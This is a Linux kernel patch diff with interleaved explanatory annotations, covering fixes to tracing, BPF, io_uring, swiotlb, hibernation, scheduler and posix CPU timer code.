+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -36,15 +37,16 @@ TRACE_EVENT(qrtr_ns_service_announce_new,
+ 
+ TRACE_EVENT(qrtr_ns_service_announce_del,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -62,15 +64,16 @@ TRACE_EVENT(qrtr_ns_service_announce_del,
+ 
+ TRACE_EVENT(qrtr_ns_server_add,
+ 
+-	TP_PROTO(__le32 service, __le32 instance, __le32 node, __le32 port),
++	TP_PROTO(unsigned int service, unsigned int instance,
++		 unsigned int node, unsigned int port),
+ 
+ 	TP_ARGS(service, instance, node, port),
+ 
+ 	TP_STRUCT__entry(
+-		__field(__le32, service)
+-		__field(__le32, instance)
+-		__field(__le32, node)
+-		__field(__le32, port)
++		__field(unsigned int, service)
++		__field(unsigned int, instance)
++		__field(unsigned int, node)
++		__field(unsigned int, port)
+ 	),
+ 
+ 	TP_fast_assign(
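The qrtr trace hunks above stop storing __le32 values raw in the ring buffer, where they would read byte-swapped on big-endian hosts and upset sparse. The call sites presumably convert to host order before tracing; a sketch of the expected shape (srv is illustrative, not taken from these hunks):

	trace_qrtr_ns_server_add(le32_to_cpu(srv->service),
				 le32_to_cpu(srv->instance),
				 le32_to_cpu(srv->node),
				 le32_to_cpu(srv->port));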
+diff --git a/include/trace/events/timer.h b/include/trace/events/timer.h
+index 2e713a7d9aa3a..3e8619c72f774 100644
+--- a/include/trace/events/timer.h
++++ b/include/trace/events/timer.h
+@@ -371,7 +371,8 @@ TRACE_EVENT(itimer_expire,
+ 		tick_dep_name(PERF_EVENTS)		\
+ 		tick_dep_name(SCHED)			\
+ 		tick_dep_name(CLOCK_UNSTABLE)		\
+-		tick_dep_name_end(RCU)
++		tick_dep_name(RCU)			\
++		tick_dep_name_end(RCU_EXP)
+ 
+ #undef tick_dep_name
+ #undef tick_dep_mask_name
+diff --git a/include/trace/stages/stage5_get_offsets.h b/include/trace/stages/stage5_get_offsets.h
+index fba4c24ed9e60..def36fbb8c5cd 100644
+--- a/include/trace/stages/stage5_get_offsets.h
++++ b/include/trace/stages/stage5_get_offsets.h
+@@ -9,17 +9,30 @@
+ #undef __entry
+ #define __entry entry
+ 
++/*
++ * Fields should never declare an array: i.e. __field(int, arr[5])
++ * If they do, it will cause issues in parsing and possibly corrupt the
++ * events. To prevent that from happening, test the sizeof() a fictitious
++ * type called "struct _test_no_array_##item" which will fail if "item"
++ * contains array elements (like "arr[5]").
++ *
++ * If you hit this, use __array(int, arr, 5) instead.
++ */
+ #undef __field
+-#define __field(type, item)
++#define __field(type, item)					\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_ext
+-#define __field_ext(type, item, filter_type)
++#define __field_ext(type, item, filter_type)			\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_struct
+-#define __field_struct(type, item)
++#define __field_struct(type, item)				\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __field_struct_ext
+-#define __field_struct_ext(type, item, filter_type)
++#define __field_struct_ext(type, item, filter_type)		\
++	{ (void)sizeof(struct _test_no_array_##item *); }
+ 
+ #undef __array
+ #define __array(type, item, len)
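The __field() redefinitions above are a parse-time trap: pasting the field name onto a struct tag yields an ill-formed type exactly when the name smuggles in an array suffix. A standalone illustration of the same trick, names hypothetical:

	#define CHECK_NO_ARRAY(item) \
		{ (void)sizeof(struct _test_no_array_##item *); }

	void ok(void)
	{
		CHECK_NO_ARRAY(len);	/* fine: pointer to an undeclared struct */
	}

	/* CHECK_NO_ARRAY(arr[5]) would expand to
	 *	(void)sizeof(struct _test_no_array_arr[5] *);
	 * which is not a valid type name, so the build breaks at the offending
	 * TRACE_EVENT() instead of silently corrupting event parsing. */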
+diff --git a/include/uapi/linux/btrfs.h b/include/uapi/linux/btrfs.h
+index 5655e89b962be..d4d4fa0bb362e 100644
+--- a/include/uapi/linux/btrfs.h
++++ b/include/uapi/linux/btrfs.h
+@@ -181,6 +181,7 @@ struct btrfs_scrub_progress {
+ };
+ 
+ #define BTRFS_SCRUB_READONLY	1
++#define BTRFS_SCRUB_SUPPORTED_FLAGS	(BTRFS_SCRUB_READONLY)
+ struct btrfs_ioctl_scrub_args {
+ 	__u64 devid;				/* in */
+ 	__u64 start;				/* in */
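BTRFS_SCRUB_SUPPORTED_FLAGS gives the scrub ioctl a single mask of flag bits the kernel understands. The validation hunk presumably lives elsewhere in the patch; the conventional use of such a mask would be (sa being the struct btrfs_ioctl_scrub_args copied from userspace):

	if (sa->flags & ~BTRFS_SCRUB_SUPPORTED_FLAGS)
		return -EOPNOTSUPP;	/* unknown flag bits from userspace */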
+diff --git a/include/uapi/linux/const.h b/include/uapi/linux/const.h
+index af2a44c08683d..a429381e7ca50 100644
+--- a/include/uapi/linux/const.h
++++ b/include/uapi/linux/const.h
+@@ -28,7 +28,7 @@
+ #define _BITUL(x)	(_UL(1) << (x))
+ #define _BITULL(x)	(_ULL(1) << (x))
+ 
+-#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
++#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (__typeof__(x))(a) - 1)
+ #define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+ 
+ #define __KERNEL_DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))
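uapi/linux/const.h is compiled by userspace, where `typeof` is a GNU keyword that strict-ISO modes reject while `__typeof__` is accepted in any GNU-compatible mode; hence the spelling change in __ALIGN_KERNEL(). A two-line reproducer:

	/* gcc -std=c99 -c t.c */
	int a; typeof(a) b;		/* error: unknown type name 'typeof' */
	int c; __typeof__(c) d;		/* compiles */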
+diff --git a/include/xen/xen.h b/include/xen/xen.h
+index a99bab8175234..b088f0d316892 100644
+--- a/include/xen/xen.h
++++ b/include/xen/xen.h
+@@ -71,4 +71,15 @@ static inline void xen_free_unpopulated_pages(unsigned int nr_pages,
+ }
+ #endif
+ 
++#if defined(CONFIG_XEN_DOM0) && defined(CONFIG_ACPI) && defined(CONFIG_X86)
++bool __init xen_processor_present(uint32_t acpi_id);
++#else
++#include <linux/bug.h>
++static inline bool xen_processor_present(uint32_t acpi_id)
++{
++	BUG();
++	return false;
++}
++#endif
++
+ #endif	/* _XEN_XEN_H */
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 4426d0e15174f..cce95164204f3 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -562,7 +562,7 @@ static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
+ 		}
+ 
+ 		ctx->user_bufs[i] = imu;
+-		*io_get_tag_slot(ctx->buf_data, offset) = tag;
++		*io_get_tag_slot(ctx->buf_data, i) = tag;
+ 	}
+ 
+ 	if (needs_switch)
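The io_uring one-liner stores the buffer tag through i, the same index used to install the buffer itself, instead of the raw offset; presumably i is the bounds-sanitized form of the user-supplied offset, and both stores must go through it. Schematic of the loop body after the fix (surrounding context assumed, not shown in the hunk):

	i = array_index_nospec(up->offset + done, ctx->nr_user_bufs);
	ctx->user_bufs[i] = imu;
	*io_get_tag_slot(ctx->buf_data, i) = tag;	/* same index as the buffer */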
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index b73169737a01e..a8838a32f750e 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -572,8 +572,8 @@ static s32 bpf_find_btf_id(const char *name, u32 kind, struct btf **btf_p)
+ 			*btf_p = btf;
+ 			return ret;
+ 		}
+-		spin_lock_bh(&btf_idr_lock);
+ 		btf_put(btf);
++		spin_lock_bh(&btf_idr_lock);
+ 	}
+ 	spin_unlock_bh(&btf_idr_lock);
+ 	return ret;
+@@ -5333,12 +5333,8 @@ struct btf *bpf_prog_get_target_btf(const struct bpf_prog *prog)
+ 
+ static bool is_int_ptr(struct btf *btf, const struct btf_type *t)
+ {
+-	/* t comes in already as a pointer */
+-	t = btf_type_by_id(btf, t->type);
+-
+-	/* allow const */
+-	if (BTF_INFO_KIND(t->info) == BTF_KIND_CONST)
+-		t = btf_type_by_id(btf, t->type);
++	/* skip modifiers */
++	t = btf_type_skip_modifiers(btf, t->type, NULL);
+ 
+ 	return btf_type_is_int(t);
+ }
+@@ -7961,12 +7957,10 @@ check_modules:
+ 		btf_get(mod_btf);
+ 		spin_unlock_bh(&btf_idr_lock);
+ 		cands = bpf_core_add_cands(cands, mod_btf, btf_nr_types(main_btf));
+-		if (IS_ERR(cands)) {
+-			btf_put(mod_btf);
++		btf_put(mod_btf);
++		if (IS_ERR(cands))
+ 			return ERR_CAST(cands);
+-		}
+ 		spin_lock_bh(&btf_idr_lock);
+-		btf_put(mod_btf);
+ 	}
+ 	spin_unlock_bh(&btf_idr_lock);
+ 	/* cands is a pointer to kmalloced memory here if cands->cnt > 0
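Both btf.c locking hunks move btf_put() outside btf_idr_lock. Dropping the final reference inside btf_put() can itself need btf_idr_lock (to release the BTF ID), so calling it with the lock held risks self-deadlock; that is presumably the motivation. Schematically:

	/* hazard the reordering avoids (schematic, not the patched code) */
	spin_lock_bh(&btf_idr_lock);
	btf_put(btf);		/* last ref may re-take btf_idr_lock: deadlock */

	/* safe order used above */
	btf_put(btf);
	spin_lock_bh(&btf_idr_lock);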
+diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
+index bf2fdb33fb313..819f011f0a9cd 100644
+--- a/kernel/bpf/cgroup.c
++++ b/kernel/bpf/cgroup.c
+@@ -1921,14 +1921,17 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 	if (ret < 0)
+ 		goto out;
+ 
+-	if (ctx.optlen > max_optlen || ctx.optlen < 0) {
++	if (optval && (ctx.optlen > max_optlen || ctx.optlen < 0)) {
+ 		ret = -EFAULT;
+ 		goto out;
+ 	}
+ 
+ 	if (ctx.optlen != 0) {
+-		if (copy_to_user(optval, ctx.optval, ctx.optlen) ||
+-		    put_user(ctx.optlen, optlen)) {
++		if (optval && copy_to_user(optval, ctx.optval, ctx.optlen)) {
++			ret = -EFAULT;
++			goto out;
++		}
++		if (put_user(ctx.optlen, optlen)) {
+ 			ret = -EFAULT;
+ 			goto out;
+ 		}
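The cgroup getsockopt hunks let the BPF hook tolerate optval == NULL, which userspace legitimately passes to ask only for the option length; optlen must still reach the caller in that case. A userspace sketch of the now-working pattern (option chosen for illustration):

	socklen_t len = 0;

	/* NULL buffer: query how large the payload would be */
	if (getsockopt(fd, SOL_NETLINK, NETLINK_LIST_MEMBERSHIPS, NULL, &len) == 0)
		printf("need %u bytes\n", (unsigned int)len);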
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 8db2ed564939b..8726161076134 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -1590,9 +1590,9 @@ static void __reg_bound_offset(struct bpf_reg_state *reg)
+ 	struct tnum var64_off = tnum_intersect(reg->var_off,
+ 					       tnum_range(reg->umin_value,
+ 							  reg->umax_value));
+-	struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
+-						tnum_range(reg->u32_min_value,
+-							   reg->u32_max_value));
++	struct tnum var32_off = tnum_intersect(tnum_subreg(var64_off),
++					       tnum_range(reg->u32_min_value,
++							  reg->u32_max_value));
+ 
+ 	reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
+ }
+@@ -3518,17 +3518,13 @@ static int check_stack_read(struct bpf_verifier_env *env,
+ 	}
+ 	/* Variable offset is prohibited for unprivileged mode for simplicity
+ 	 * since it requires corresponding support in Spectre masking for stack
+-	 * ALU. See also retrieve_ptr_limit().
++	 * ALU. See also retrieve_ptr_limit(). The check in
++	 * check_stack_access_for_ptr_arithmetic() called by
++	 * adjust_ptr_min_max_vals() prevents users from creating stack pointers
++	 * with variable offsets, therefore no check is required here. Further,
++	 * just checking it here would be insufficient as speculative stack
++	 * writes could still lead to unsafe speculative behaviour.
+ 	 */
+-	if (!env->bypass_spec_v1 && var_off) {
+-		char tn_buf[48];
+-
+-		tnum_strn(tn_buf, sizeof(tn_buf), reg->var_off);
+-		verbose(env, "R%d variable offset stack access prohibited for !root, var_off=%s\n",
+-				ptr_regno, tn_buf);
+-		return -EACCES;
+-	}
+-
+ 	if (!var_off) {
+ 		off += reg->var_off.value;
+ 		err = check_stack_read_fixed_off(env, state, off, size,
+@@ -11908,10 +11904,11 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ 		state_reg = state->regs;
+ 		for (i = 0; i < BPF_REG_FP; i++, state_reg++) {
+ 			if (state_reg->type != SCALAR_VALUE ||
+-			    !state_reg->precise)
++			    !state_reg->precise ||
++			    !(state_reg->live & REG_LIVE_READ))
+ 				continue;
+ 			if (env->log.level & BPF_LOG_LEVEL2)
+-				verbose(env, "frame %d: propagating r%d\n", i, fr);
++				verbose(env, "frame %d: propagating r%d\n", fr, i);
+ 			err = mark_chain_precision_frame(env, fr, i);
+ 			if (err < 0)
+ 				return err;
+@@ -11922,11 +11919,12 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ 				continue;
+ 			state_reg = &state->stack[i].spilled_ptr;
+ 			if (state_reg->type != SCALAR_VALUE ||
+-			    !state_reg->precise)
++			    !state_reg->precise ||
++			    !(state_reg->live & REG_LIVE_READ))
+ 				continue;
+ 			if (env->log.level & BPF_LOG_LEVEL2)
+ 				verbose(env, "frame %d: propagating fp%d\n",
+-					(-i - 1) * BPF_REG_SIZE, fr);
++					fr, (-i - 1) * BPF_REG_SIZE);
+ 			err = mark_chain_precision_stack_frame(env, fr, i);
+ 			if (err < 0)
+ 				return err;
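Three verifier fixes sit above. The first reworks __reg_bound_offset() so the 32-bit view is projected from the already-refined 64-bit tnum; the second drops a variable-offset stack-read rejection that the new comment explains is both redundant and, alone, insufficient; the third makes precision propagation skip never-read registers and prints frame and register in the right order. The first, schematically:

	/* before: var32 came from the stale reg->var_off
	 * after:  var32 comes from var64_off, which already folds in the
	 *         umin/umax range, so 64-bit knowledge narrows the u32 view */
	var64_off = tnum_intersect(reg->var_off, tnum_range(umin, umax));
	var32_off = tnum_intersect(tnum_subreg(var64_off),
				   tnum_range(u32_min, u32_max));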
+diff --git a/kernel/dma/swiotlb.c b/kernel/dma/swiotlb.c
+index 339a990554e7f..7f4ad5e70b40c 100644
+--- a/kernel/dma/swiotlb.c
++++ b/kernel/dma/swiotlb.c
+@@ -919,7 +919,9 @@ EXPORT_SYMBOL_GPL(is_swiotlb_active);
+ 
+ static int io_tlb_used_get(void *data, u64 *val)
+ {
+-	*val = mem_used(&io_tlb_default_mem);
++	struct io_tlb_mem *mem = data;
++
++	*val = mem_used(mem);
+ 	return 0;
+ }
+ DEFINE_DEBUGFS_ATTRIBUTE(fops_io_tlb_used, io_tlb_used_get, NULL, "%llu\n");
+@@ -932,7 +934,7 @@ static void swiotlb_create_debugfs_files(struct io_tlb_mem *mem,
+ 		return;
+ 
+ 	debugfs_create_ulong("io_tlb_nslabs", 0400, mem->debugfs, &mem->nslabs);
+-	debugfs_create_file("io_tlb_used", 0400, mem->debugfs, NULL,
++	debugfs_create_file("io_tlb_used", 0400, mem->debugfs, mem,
+ 			&fops_io_tlb_used);
+ }
+ 
+@@ -987,6 +989,11 @@ static int rmem_swiotlb_device_init(struct reserved_mem *rmem,
+ 	/* Set Per-device io tlb area to one */
+ 	unsigned int nareas = 1;
+ 
++	if (PageHighMem(pfn_to_page(PHYS_PFN(rmem->base)))) {
++		dev_err(dev, "Restricted DMA pool must be accessible within the linear mapping.");
++		return -EINVAL;
++	}
++
+ 	/*
+ 	 * Since multiple devices can share the same pool, the private data,
+ 	 * io_tlb_mem struct, will be initialized by the first device attached
+@@ -1048,11 +1055,6 @@ static int __init rmem_swiotlb_setup(struct reserved_mem *rmem)
+ 	    of_get_flat_dt_prop(node, "no-map", NULL))
+ 		return -EINVAL;
+ 
+-	if (PageHighMem(pfn_to_page(PHYS_PFN(rmem->base)))) {
+-		pr_err("Restricted DMA pool must be accessible within the linear mapping.");
+-		return -EINVAL;
+-	}
+-
+ 	rmem->ops = &rmem_swiotlb_ops;
+ 	pr_info("Reserved memory: created restricted DMA pool at %pa, size %ld MiB\n",
+ 		&rmem->base, (unsigned long)rmem->size / SZ_1M);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 7699b99706ad4..934332b3eb541 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -9254,8 +9254,8 @@ __perf_event_account_interrupt(struct perf_event *event, int throttle)
+ 		hwc->interrupts = 1;
+ 	} else {
+ 		hwc->interrupts++;
+-		if (unlikely(throttle
+-			     && hwc->interrupts >= max_samples_per_tick)) {
++		if (unlikely(throttle &&
++			     hwc->interrupts > max_samples_per_tick)) {
+ 			__this_cpu_inc(perf_throttled_count);
+ 			tick_dep_set_cpu(smp_processor_id(), TICK_DEP_BIT_PERF_EVENTS);
+ 			hwc->interrupts = MAX_INTERRUPTS;
+diff --git a/kernel/kcsan/core.c b/kernel/kcsan/core.c
+index 54d077e1a2dc7..5a60cc52adc0c 100644
+--- a/kernel/kcsan/core.c
++++ b/kernel/kcsan/core.c
+@@ -337,11 +337,20 @@ static void delay_access(int type)
+  */
+ static __always_inline u64 read_instrumented_memory(const volatile void *ptr, size_t size)
+ {
++	/*
++	 * In the below we don't necessarily need the read of the location to
++	 * be atomic, and we don't use READ_ONCE(), since all we need for race
++	 * detection is to observe 2 different values.
++	 *
++	 * Furthermore, on certain architectures (such as arm64), READ_ONCE()
++	 * may turn into more complex instructions than a plain load that cannot
++	 * do unaligned accesses.
++	 */
+ 	switch (size) {
+-	case 1:  return READ_ONCE(*(const u8 *)ptr);
+-	case 2:  return READ_ONCE(*(const u16 *)ptr);
+-	case 4:  return READ_ONCE(*(const u32 *)ptr);
+-	case 8:  return READ_ONCE(*(const u64 *)ptr);
++	case 1:  return *(const volatile u8 *)ptr;
++	case 2:  return *(const volatile u16 *)ptr;
++	case 4:  return *(const volatile u32 *)ptr;
++	case 8:  return *(const volatile u64 *)ptr;
+ 	default: return 0; /* Ignore; we do not diff the values. */
+ 	}
+ }
+diff --git a/kernel/kheaders.c b/kernel/kheaders.c
+index 8f69772af77b4..42163c9e94e55 100644
+--- a/kernel/kheaders.c
++++ b/kernel/kheaders.c
+@@ -26,15 +26,15 @@ asm (
+ "	.popsection				\n"
+ );
+ 
+-extern char kernel_headers_data;
+-extern char kernel_headers_data_end;
++extern char kernel_headers_data[];
++extern char kernel_headers_data_end[];
+ 
+ static ssize_t
+ ikheaders_read(struct file *file,  struct kobject *kobj,
+ 	       struct bin_attribute *bin_attr,
+ 	       char *buf, loff_t off, size_t len)
+ {
+-	memcpy(buf, &kernel_headers_data + off, len);
++	memcpy(buf, &kernel_headers_data[off], len);
+ 	return len;
+ }
+ 
+@@ -48,8 +48,8 @@ static struct bin_attribute kheaders_attr __ro_after_init = {
+ 
+ static int __init ikheaders_init(void)
+ {
+-	kheaders_attr.size = (&kernel_headers_data_end -
+-			      &kernel_headers_data);
++	kheaders_attr.size = (kernel_headers_data_end -
++			      kernel_headers_data);
+ 	return sysfs_create_bin_file(kernel_kobj, &kheaders_attr);
+ }
+ 
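The kheaders fix is the standard extern-array idiom: declaring blob boundary symbols as single chars makes `&end - &start` a subtraction between two unrelated one-byte objects, which is formally undefined and invites miscompilation; incomplete array declarations give the symbols the right shape and decay cleanly to pointers. The reusable pattern, names hypothetical:

	/* symbols emitted around an .incbin'd blob; names illustrative */
	extern char blob_start[];
	extern char blob_end[];

	static inline size_t blob_size(void)
	{
		return blob_end - blob_start;	/* arrays decay to pointers */
	}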
+diff --git a/kernel/power/hibernate.c b/kernel/power/hibernate.c
+index 793c55a2becba..30d1274f03f62 100644
+--- a/kernel/power/hibernate.c
++++ b/kernel/power/hibernate.c
+@@ -64,6 +64,7 @@ enum {
+ static int hibernation_mode = HIBERNATION_SHUTDOWN;
+ 
+ bool freezer_test_done;
++bool snapshot_test;
+ 
+ static const struct platform_hibernation_ops *hibernation_ops;
+ 
+@@ -687,18 +688,22 @@ static int load_image_and_restore(void)
+ {
+ 	int error;
+ 	unsigned int flags;
++	fmode_t mode = FMODE_READ;
++
++	if (snapshot_test)
++		mode |= FMODE_EXCL;
+ 
+ 	pm_pr_dbg("Loading hibernation image.\n");
+ 
+ 	lock_device_hotplug();
+ 	error = create_basic_memory_bitmaps();
+ 	if (error) {
+-		swsusp_close(FMODE_READ | FMODE_EXCL);
++		swsusp_close(mode);
+ 		goto Unlock;
+ 	}
+ 
+ 	error = swsusp_read(&flags);
+-	swsusp_close(FMODE_READ | FMODE_EXCL);
++	swsusp_close(mode);
+ 	if (!error)
+ 		error = hibernation_restore(flags & SF_PLATFORM_MODE);
+ 
+@@ -716,7 +721,6 @@ static int load_image_and_restore(void)
+  */
+ int hibernate(void)
+ {
+-	bool snapshot_test = false;
+ 	unsigned int sleep_flags;
+ 	int error;
+ 
+@@ -744,6 +748,9 @@ int hibernate(void)
+ 	if (error)
+ 		goto Exit;
+ 
++	/* protected by system_transition_mutex */
++	snapshot_test = false;
++
+ 	lock_device_hotplug();
+ 	/* Allocate memory management structures */
+ 	error = create_basic_memory_bitmaps();
+@@ -940,6 +947,8 @@ static int software_resume(void)
+ 	 */
+ 	mutex_lock_nested(&system_transition_mutex, SINGLE_DEPTH_NESTING);
+ 
++	snapshot_test = false;
++
+ 	if (swsusp_resume_device)
+ 		goto Check_image;
+ 
+diff --git a/kernel/power/power.h b/kernel/power/power.h
+index b4f4339432096..b83c8d5e188de 100644
+--- a/kernel/power/power.h
++++ b/kernel/power/power.h
+@@ -59,6 +59,7 @@ asmlinkage int swsusp_save(void);
+ 
+ /* kernel/power/hibernate.c */
+ extern bool freezer_test_done;
++extern bool snapshot_test;
+ 
+ extern int hibernation_snapshot(int platform_mode);
+ extern int hibernation_restore(int platform_mode);
+diff --git a/kernel/power/swap.c b/kernel/power/swap.c
+index 277434b6c0bfd..cc44c37699de6 100644
+--- a/kernel/power/swap.c
++++ b/kernel/power/swap.c
+@@ -1518,9 +1518,13 @@ int swsusp_check(void)
+ {
+ 	int error;
+ 	void *holder;
++	fmode_t mode = FMODE_READ;
++
++	if (snapshot_test)
++		mode |= FMODE_EXCL;
+ 
+ 	hib_resume_bdev = blkdev_get_by_dev(swsusp_resume_device,
+-					    FMODE_READ | FMODE_EXCL, &holder);
++					    mode, &holder);
+ 	if (!IS_ERR(hib_resume_bdev)) {
+ 		set_blocksize(hib_resume_bdev, PAGE_SIZE);
+ 		clear_page(swsusp_header);
+@@ -1547,7 +1551,7 @@ int swsusp_check(void)
+ 
+ put:
+ 		if (error)
+-			blkdev_put(hib_resume_bdev, FMODE_READ | FMODE_EXCL);
++			blkdev_put(hib_resume_bdev, mode);
+ 		else
+ 			pr_debug("Image signature found, resuming\n");
+ 	} else {
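The hibernate/swap hunks thread one snapshot_test flag (serialized by system_transition_mutex, per the comment above) down to every open and close of the resume block device, so the FMODE_EXCL bit is applied, or not, consistently on both ends. The recurring shape:

	fmode_t mode = FMODE_READ;

	if (snapshot_test)
		mode |= FMODE_EXCL;
	/* ... blkdev_get_by_dev(..., mode, ...) ... */
	blkdev_put(hib_resume_bdev, mode);	/* must mirror the open mode */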
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 14d9384fba056..ce34ca0b5b985 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -665,6 +665,7 @@ void __rcu_irq_enter_check_tick(void)
+ 	}
+ 	raw_spin_unlock_rcu_node(rdp->mynode);
+ }
++NOKPROBE_SYMBOL(__rcu_irq_enter_check_tick);
+ #endif /* CONFIG_NO_HZ_FULL */
+ 
+ /*
+diff --git a/kernel/relay.c b/kernel/relay.c
+index 88bcb09f0a1f2..1cb4bb9f09a34 100644
+--- a/kernel/relay.c
++++ b/kernel/relay.c
+@@ -989,7 +989,8 @@ static size_t relay_file_read_start_pos(struct rchan_buf *buf)
+ 	size_t subbuf_size = buf->chan->subbuf_size;
+ 	size_t n_subbufs = buf->chan->n_subbufs;
+ 	size_t consumed = buf->subbufs_consumed % n_subbufs;
+-	size_t read_pos = consumed * subbuf_size + buf->bytes_consumed;
++	size_t read_pos = (consumed * subbuf_size + buf->bytes_consumed)
++			% (n_subbufs * subbuf_size);
+ 
+ 	read_subbuf = read_pos / subbuf_size;
+ 	padding = buf->padding[read_subbuf];
+diff --git a/kernel/sched/deadline.c b/kernel/sched/deadline.c
+index 9ae8f41e3372f..f7d381b6c3133 100644
+--- a/kernel/sched/deadline.c
++++ b/kernel/sched/deadline.c
+@@ -2246,6 +2246,7 @@ static struct rq *find_lock_later_rq(struct task_struct *task, struct rq *rq)
+ 				     !cpumask_test_cpu(later_rq->cpu, &task->cpus_mask) ||
+ 				     task_on_cpu(rq, task) ||
+ 				     !dl_task(task) ||
++				     is_migration_disabled(task) ||
+ 				     !task_on_rq_queued(task))) {
+ 				double_unlock_balance(rq, later_rq);
+ 				later_rq = NULL;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index f70c4a7fb4ef3..fa33c441ae867 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6475,7 +6475,7 @@ static int wake_affine(struct sched_domain *sd, struct task_struct *p,
+ 		target = wake_affine_weight(sd, p, this_cpu, prev_cpu, sync);
+ 
+ 	schedstat_inc(p->stats.nr_wakeups_affine_attempts);
+-	if (target == nr_cpumask_bits)
++	if (target != this_cpu)
+ 		return prev_cpu;
+ 
+ 	schedstat_inc(sd->ttwu_move_affine);
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 0a11f44adee57..4f5796dd26a56 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -2000,11 +2000,15 @@ static struct rq *find_lock_lowest_rq(struct task_struct *task, struct rq *rq)
+ 			 * the mean time, task could have
+ 			 * migrated already or had its affinity changed.
+ 			 * Also make sure that it wasn't scheduled on its rq.
++			 * It is possible the task was scheduled, set
++			 * "migrate_disabled" and then got preempted, so we must
++			 * check the task migration disable flag here too.
+ 			 */
+ 			if (unlikely(task_rq(task) != rq ||
+ 				     !cpumask_test_cpu(lowest_rq->cpu, &task->cpus_mask) ||
+ 				     task_on_cpu(rq, task) ||
+ 				     !rt_task(task) ||
++				     is_migration_disabled(task) ||
+ 				     !task_on_rq_queued(task))) {
+ 
+ 				double_unlock_balance(rq, lowest_rq);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8b..44b25ff35d28a 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -847,6 +847,8 @@ static u64 collect_timerqueue(struct timerqueue_head *head,
+ 			return expires;
+ 
+ 		ctmr->firing = 1;
++		/* See posix_cpu_timer_wait_running() */
++		rcu_assign_pointer(ctmr->handling, current);
+ 		cpu_timer_dequeue(ctmr);
+ 		list_add_tail(&ctmr->elist, firing);
+ 	}
+@@ -1162,7 +1164,49 @@ static void handle_posix_cpu_timers(struct task_struct *tsk);
+ #ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
+ static void posix_cpu_timers_work(struct callback_head *work)
+ {
++	struct posix_cputimers_work *cw = container_of(work, typeof(*cw), work);
++
++	mutex_lock(&cw->mutex);
+ 	handle_posix_cpu_timers(current);
++	mutex_unlock(&cw->mutex);
++}
++
++/*
++ * Invoked from the posix-timer core when a cancel operation failed because
++ * the timer is marked firing. The caller holds rcu_read_lock(), which
++ * protects the timer and the task which is expiring it from being freed.
++ */
++static void posix_cpu_timer_wait_running(struct k_itimer *timr)
++{
++	struct task_struct *tsk = rcu_dereference(timr->it.cpu.handling);
++
++	/* Has the handling task completed expiry already? */
++	if (!tsk)
++		return;
++
++	/* Ensure that the task cannot go away */
++	get_task_struct(tsk);
++	/* Now drop the RCU protection so the mutex can be locked */
++	rcu_read_unlock();
++	/* Wait on the expiry mutex */
++	mutex_lock(&tsk->posix_cputimers_work.mutex);
++	/* Release it immediately again. */
++	mutex_unlock(&tsk->posix_cputimers_work.mutex);
++	/* Drop the task reference. */
++	put_task_struct(tsk);
++	/* Relock RCU so the callsite is balanced */
++	rcu_read_lock();
++}
++
++static void posix_cpu_timer_wait_running_nsleep(struct k_itimer *timr)
++{
++	/* Ensure that timr->it.cpu.handling task cannot go away */
++	rcu_read_lock();
++	spin_unlock_irq(&timr->it_lock);
++	posix_cpu_timer_wait_running(timr);
++	rcu_read_unlock();
++	/* @timr is on stack and is valid */
++	spin_lock_irq(&timr->it_lock);
+ }
+ 
+ /*
+@@ -1178,6 +1222,7 @@ void clear_posix_cputimers_work(struct task_struct *p)
+ 	       sizeof(p->posix_cputimers_work.work));
+ 	init_task_work(&p->posix_cputimers_work.work,
+ 		       posix_cpu_timers_work);
++	mutex_init(&p->posix_cputimers_work.mutex);
